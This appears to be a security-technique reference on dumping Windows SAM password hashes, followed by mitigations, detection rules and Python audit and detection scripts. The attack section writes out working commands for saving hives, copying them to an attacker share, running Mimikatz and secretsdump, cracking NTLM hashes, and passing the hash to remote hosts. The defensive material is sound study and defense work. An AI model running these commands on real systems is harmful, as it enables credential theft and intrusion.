🧠 Description

The Security Account Manager (SAM) database stores local user account hashes on Windows systems. Extracting the SAM database allows attackers to obtain NTLM password hashes for all local accounts, which can then be cracked or used for Pass-the-Hash attacks.

Why SAM Extraction Works:
  • Local Storage: the SAM hive holds the password hashes of every local account
  • Registry Access: Administrators (and SYSTEM) can save the SAM and SYSTEM hives; the boot key in SYSTEM decrypts the hashes in SAM, which is why both hives are taken together
  • Offline Parsing: saved hives can be parsed and cracked offline, away from any host-based control
  • LM Hashes: where still stored, trivially cracked (not stored by default since Windows Vista / Server 2008)

💣 Extraction Methods

1. Registry Save (Requires Admin):

# Save SAM and SYSTEM hives
reg save HKLM\SAM sam.hive /y
reg save HKLM\SYSTEM system.hive /y

# The live hives are %WINDIR%\System32\config\SAM and \SYSTEM;
# reg save writes the copies to the current directory

# Alternative - copy the hive files directly (the live files are held open by the kernel,
# so a plain copy normally fails with a sharing violation; hence the shadow-copy method below)
copy C:\Windows\System32\config\SAM \\attacker\share\SAM
copy C:\Windows\System32\config\SYSTEM \\attacker\share\SYSTEM

2. Volume Shadow Copy (Alternative Method):

# Create VSS snapshot
vssadmin create shadow /for=C:

# Copy SAM from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM

# Cleanup
vssadmin delete shadows /shadow={shadow_id}

3. Mimikatz (Direct Extraction):

# Token elevation then extract
mimikatz "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# From SAM file directly
mimikatz "lsadump::sam /sam:sam.hive /system:system.hive" "exit"

# With explicit file location
lsadump::sam /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

# Note: the SAM holds local accounts only; cached domain credentials live in the
# SECURITY hive and are not produced by this command
lsadump::sam /sam:sam.hive /system:system.hive /bootkey

4. Impacket SecretsDump (Linux):

# Parse saved hives
python3 secretsdump.py -sam sam.hive -system system.hive LOCAL

# With only the SYSTEM hive, secretsdump prints just the boot key (no hashes)
python3 secretsdump.py -system system.hive LOCAL

# From remote host with credentials
python3 secretsdump.py user:password@target.corp.com

# Using pass-the-hash
python3 secretsdump.py -hashes :ntlmhash domain/user@target.corp.com

🔓 Hash Cracking

Hashcat:

# NTLM hash cracking (mode 1000)
hashcat -m 1000 -a 0 hashes.txt wordlist.txt

# LM hash cracking (mode 3000)
hashcat -m 3000 -a 0 hashes.txt wordlist.txt

# Combined wordlist + rules
hashcat -m 1000 -a 0 hashes.txt wordlist.txt -r rules/best64.rule

# Show already-cracked hashes from the potfile
hashcat -m 1000 hashes.txt --show

John the Ripper:

# NTLM: the NT format accepts pwdump-style user:RID:lmhash:nthash::: lines as-is
# (older jumbo builds listed this format as nt2)
john --format=NT --wordlist=wordlist.txt hashes.txt

# The same format also accepts files containing one raw NT hash per line
john --format=NT --wordlist=wordlist.txt raw_nthashes.txt

# Auto-detect format
john hashes.txt --wordlist=wordlist.txt

# Show cracked passwords
john --show hashes.txt

Format for Cracking:

# Mimikatz and secretsdump output is pwdump-style:
# username:RID:lmhash:nthash:::

# Example (placeholder NT hash):
# administrator:500:aad3b435b51404eeaad3b435b51404ee:hash1234567890:::
# aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string, i.e. "no LM hash stored"

# hashcat -m 1000 expects one bare NT hash per line (hash1234567890), or the full
# pwdump line together with --username; John accepts the pwdump line unchanged

🎯 Pass-the-Hash with SAM Hashes

Use the Hashes Directly (no cracking needed):

# Mimikatz PtH
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:target /ntlm:hash" "exit"

# CrackMapExec
crackmapexec smb target.corp.com -u administrator -H nthash -x "whoami"

# Impacket wmiexec with pass-the-hash (empty LM part before the colon)
python3 wmiexec.py -hashes :nthash domain/user@target.corp.com

# Using evil-winrm
evil-winrm -i target.corp.com -u administrator -H nthash

Crack the LM Hash if One Is Present:

# An LM hash, where still stored, is far weaker than the NT hash of the same password
# Some systems still store LM for compatibility with legacy clients

# Crack LM with hashcat (mode 3000)
hashcat -m 3000 -a 0 lm_hashes.txt wordlist.txt

🛡️ Mitigation

✅ Primary Controls:
  • Disable LM Hashes: No LM storage in SAM
  • Strong Passwords: 14+ characters, complex, unique
  • Local Admin Protection: Microsoft LAPS or similar
  • Restrict Registry: Limit who can save hives
  • BitLocker: Encrypt system drive
  • Audit Local Accounts: Monitor for suspicious admin accounts
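As an added example (not from the page or from any of the tools it lists), here is a Python audit of a pwdump-style dump in the username:RID:lmhash:nthash::: format described under Hash Cracking, checking for the conditions the mitigation items above target: LM hashes still being stored, blank passwords, and one password shared across several local accounts (the problem LAPS solves). The sample dump and its hash values are constructed.

```python
import re
from collections import defaultdict

# Well-known constants (hashes of the empty string), not secrets.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of a blank password

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)

# Constructed sample dump; hash values are made up except the two constants above.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:0123456789abcdef0123456789abcdef:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

def parse_pwdump(text):
    """Parse user:RID:lmhash:nthash::: lines; blank, comment and malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return entries

def audit(entries):
    """Return (finding, subject) pairs that map onto the mitigation items above."""
    findings, by_nt = [], defaultdict(list)
    for e in entries:
        if e["lm"] != EMPTY_LM:            # NoLMHash is not in effect for this account
            findings.append(("LM_STORED", e["user"]))
        if e["nt"] == EMPTY_NT:            # the account has no password at all
            findings.append(("BLANK_PASSWORD", e["user"]))
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():        # identical NT hash means identical password
        if nt != EMPTY_NT and len(users) > 1:
            findings.append(("SHARED_PASSWORD", ",".join(users)))
    return findings

if __name__ == "__main__":
    for finding, subject in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"{finding:16} {subject}")
```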

Disable LM Hash Storage:

# Via Security Policy
# Computer Configuration > Policies > Security Options >
# Network security: Do not store LAN Manager hash value on next password change

# Enable via registry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v NoLMHash /t REG_DWORD /d 1 /f

# Requires password change to take effect

🔍 Detection

Event Log Monitoring:

# Event ID 4657 - A registry value was modified
# Event ID 4660 - An object was deleted
# Event ID 4673 - A privileged service was called (sensitive privilege use)
# Event ID 4656 / 4663 - Handle requested / object accessed; fire for HKLM\SAM once a SACL is set on the key

# Monitor for:
# - reg.exe saving SAM/SYSTEM hives
# - Processes opening HKLM\SAM
# - Command line: reg save HKLM\SAM

# Use Sysmon
# Track registry operations on the SAM key

Sysmon Configuration:

# Registry events (Sysmon Event ID 12/13/14) - include these keys:
  HKLM\System\CurrentControlSet\Control\Lsa
  HKLM\SAM

# Process creation (Sysmon Event ID 1) - alert on a command line containing:
  reg save HKLM\SAM

Sigma Rules:

title: SAM Registry Backup
id: sam-registry-save
status: experimental
description: Detects reg.exe saving the SAM or SYSTEM hive, or command lines that reference the hive files directly
logsource:
  product: windows
  category: process_creation   # covers Sysmon Event ID 1 and Security 4688, so no EventID selection is needed
detection:
  selection:
    CommandLine|contains:
      - 'reg save HKLM\SAM'
      - 'reg save HKLM\SYSTEM'
      - '\config\SAM'
      - '\config\SYSTEM'
  condition: selection
falsepositives:
  - Backup software that reads the config directory
level: high
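The Sigma selection above, as an added example that is not part of the page, implemented in Python over constructed process-creation records and extended to the shadow-copy and Mimikatz command lines shown earlier on this page; the record fields follow Sysmon Event ID 1 naming, and the sample values are assumptions.

```python
import re

# Command-line patterns: the ones from the Sigma rule above, plus the shadow-copy
# and Mimikatz techniques shown earlier on this page.
PATTERNS = {
    "reg_save_hive":    r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system)\b",
    "hive_file_path":   r"\\config\\(?:sam|system)\b",
    "vss_create":       r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b",
    "shadow_copy_path": r"harddiskvolumeshadowcopy\d+",
    "mimikatz_sam":     r"lsadump::sam",
}
COMPILED = {name: re.compile(p, re.I) for name, p in PATTERNS.items()}

# Constructed Sysmon-style records (field names follow Sysmon; users, paths and values are made up).
EVENTS = [
    {"EventID": 1, "User": r"CORP\jdoe", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SAM C:\Users\jdoe\sam.hive /y"},
    {"EventID": 1, "User": r"CORP\jdoe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM"},
    {"EventID": 1, "User": r"NT AUTHORITY\SYSTEM", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"EventID": 1, "User": r"CORP\backupsvc", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
    {"EventID": 3, "User": r"CORP\jdoe", "Image": r"C:\Windows\System32\reg.exe"},  # not process creation
]

def classify(command_line):
    """Names of every pattern matching one command line (Sigma 'contains' is case-insensitive)."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]

def scan(events):
    """Return (user, image, matched pattern names) for each process-creation event that triggers."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:          # only Sysmon Event ID 1 carries a command line here
            continue
        matched = classify(ev.get("CommandLine", ""))
        if matched:
            hits.append((ev["User"], ev["Image"], matched))
    return hits

if __name__ == "__main__":
    for user, image, matched in scan(EVENTS):
        print(f"{user:22} {image:40} {','.join(matched)}")
```

Patterns such as \config\SYSTEM also fire on legitimate backup software, so tune on Image and User before raising this to a high-severity alert.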

🛠️ Tools

  • Mimikatz: Direct SAM extraction and parsing
  • Impacket (secretsdump): Offline SAM parsing from hives
  • hashcat: GPU-accelerated hash cracking
  • John the Ripper: Open-source hash cracking
  • Creddump7: Python-based SAM extraction